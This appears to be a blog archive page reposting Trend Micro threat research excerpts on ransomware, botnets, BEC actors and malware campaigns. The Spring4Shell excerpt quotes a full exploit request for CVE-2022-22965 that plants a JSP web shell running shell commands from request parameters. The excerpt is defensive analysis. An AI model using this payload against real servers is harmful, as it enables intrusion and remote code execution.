research

Trend Micro Partners With Interpol and Nigeria EFCC for Operation Killer Bee, Takes Down Nigerian BEC Actors

Posted on June 2, 2022June 2, 2022 by Admin

It starts with the malicious actors scraping the internet for public sites containing email addresses, which will be stored in a text file. They also use tools such as Lite Email Extractor to scrape email addresses. To expand their range of targets the malicious actors also search for specific keywords in Google, such as “LTD PLC” and “manufacturing suppliers.” After obtaining their list of targets, they may share this information with other malicious actors via…

YourCyanide: A CMD-based Ransomware With Multiple Layers of Obfuscation

Posted on June 2, 2022June 2, 2022 by Admin

The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number capabilities such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives. Source link

New Linux-Based Ransomware Cheerscrypt Targets ESXi Devices

Posted on May 25, 2022May 26, 2022 by Admin

New Linux-Based Ransomware Cheerscrypt Targets ESXi Devices Ransomware Trend Micro Research detected “Cheerscrypt”, a new Linux-based ransomware variant that compromises ESXi servers. We discuss our initial findings in this report. By: Arianne Dela Cruz, Byron Gelera, McJustine De Guzman, Warren Sto.Tomas May 25, 2022 Read time: ( words) We recently observed multiple Linux-based ransomware detections that malicious actors launched to target VMware ESXi servers, a bare-metal hypervisor for creating and running several virtual machines (VMs)…

Bruised but Not Broken: The Resurgence of the Emotet Botnet Malware

Posted on May 19, 2022May 19, 2022 by Admin

The Emotet botnet malware is well known in the cybersecurity industry for its success in using spam emails to compromise machines and then selling access to these machines as part of its infamous malware-as-a-service (MaaS) scheme. Operators behind notorious threats such as the Trickbot trojan and the Ryuk or Conti ransomware are among the malicious actors who have used the botnet malware in their attacks. But in January 2021 came news of Emotet’s dismantling, dubbed…

Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR

Posted on May 18, 2022May 18, 2022 by Admin

Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR Trend Micro’s Managed XDR team addressed a Kingminer botnet attack conducted through an SQL exploit. We discuss our findings and analysis in this report. By: Buddy Tancio, Jed Valderama May 18, 2022 Read time: ( words) We observed malicious activities in a client’s SQL server that flagged a potential exploit in one public-facing device. A quick look at the Trend Micro Vision One™ Workbench showed…

Fake Mobile Apps Steal Facebook Credentials, Cryptocurrency-Related Keys

Posted on May 16, 2022May 16, 2022 by Admin

Fake Mobile Apps Steal Facebook Credentials, Cryptocurrency-Related Keys Mobile We recently observed a number of apps on Google Play designed to perform malicious activities such as stealing user credentials and other sensitive user information, including private keys. By: Cifer Fang, Ford Quin, Zhengyu Dong May 16, 2022 Read time: ( words) We recently observed a number of apps on Google Play designed to perform malicious activities such as stealing user credentials and other sensitive user…

Examining the Black Basta Ransomware’s Infection Routine

Posted on May 9, 2022May 10, 2022 by Admin

Examining the Black Basta Ransomware’s Infection Routine Ransomware We analyze the Black Basta ransomware and examine the malicious actor’s familiar infection tactics. By: Ieriz Nicolle Gonzalez, Ivan Nicole Chavez, Katherine Casona, Nathaniel Morales May 09, 2022 Read time: ( words) Black Basta, a new ransomware gang, has swiftly risen to prominence in recent weeks after it caused massive breaches to organizations in a short span of time. On April 20, 2022, a user named Black…

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service

Posted on May 5, 2022May 5, 2022 by Admin

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service Malware This report focuses on the components and infection chain ⁠of the NetDooka framework. Its scope ranges from the release of the first payload up until the release of the final RAT that is protected by a kernel driver. By: Aliakbar Zahravi, Leandro Froes May 05, 2022 Read time: ( words) We recently encountered a fairly sophisticated malware framework that we named NetDooka after…

New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

Posted on April 27, 2022April 27, 2022 by Admin

We dubbed these downloaders PuppetDownloaders since they are connected to the PuppetLoader malware family, as evidenced by our observations: This malware and PuppetLoader both use the same string decryption routine that uses the same key. This malware and PuppetLoader both use the same XOR key (2726c6aea9970bb95211304705b5f595) that is used to decrypt the embedded Loader.dll file. This malware and PuppetLoader’s decrypted Loader.dlls share similar strings such as “[-] UnExist pwszModuleFunName:”. This suggests that a common framework…

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Posted on April 20, 2022April 20, 2022 by Admin

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners. The following code is used to create the web shell: GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1 Host: <redacted>:<redacted> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 X: <% Y: Runtime Z: %>// Accept-Encoding: gzip The web shell’s…

« 1 … 10 11 12 13 14 … 18 »

Trend Micro Partners With Interpol and Nigeria EFCC for Operation Killer Bee, Takes Down Nigerian BEC Actors

YourCyanide: A CMD-based Ransomware With Multiple Layers of Obfuscation

New Linux-Based Ransomware Cheerscrypt Targets ESXi Devices

Bruised but Not Broken: The Resurgence of the Emotet Botnet Malware

Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR

Fake Mobile Apps Steal Facebook Credentials, Cryptocurrency-Related Keys

Examining the Black Basta Ransomware’s Infection Routine

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service

New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

VMWARE

Helping Public Sector Organisations Define Cloud Strategy

How to change the VLAN ID of the Service Console in ESX from the command line/console

Cisco UCS and Vmware Interfaces (Vnics) HA Design Considerations

Troubleshooting network and TCP/UDP port connectivity issues on ESX/ESXi(2020669)

vSphere Client Parameters

Configuration Templates

CUE Licenses

Trouble shooting Unity Express with Call Manager Integeration & Operational Issues

CME Configuration Example: SIP Trunks to Viatalk and VoIP.ms

SIP Phone registration – CME Configuration

CUE Voicemail + VPIM networking (CUE to unity)